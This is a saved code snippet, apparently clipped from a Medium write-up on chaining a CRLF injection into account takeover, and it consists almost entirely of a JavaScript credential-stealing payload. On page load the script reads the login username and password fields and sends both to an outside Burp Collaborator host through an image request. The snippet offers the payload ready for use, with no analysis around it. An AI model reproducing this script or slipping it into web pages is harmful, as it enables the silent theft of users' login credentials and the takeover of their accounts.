CRLF to Account takeover (chaining bugs) | by MoSec | Jul, 2022 | Medium

PHOTO EMBED

Wed Jul 20 2022 14:24:05 GMT+0000 (Coordinated Universal Time)

Saved by @pirate

console.log("password steal loaded.");
function load() {
var email=document.getElementById('login.username').value
console.log(email);
var pass=document.getElementById('login.password').value
console.log(pass);
 new Image().src="https://pkdyhhynhiuhnza9gz4o.burpcollaborator.net/login?u=" + email + "&p=" + pass;
}
window.onload = load;
content_copyCOPY

https://medium.com/@moSec/crlf-to-account-takeover-chaining-bugs-21a25dfa1cdf#id_token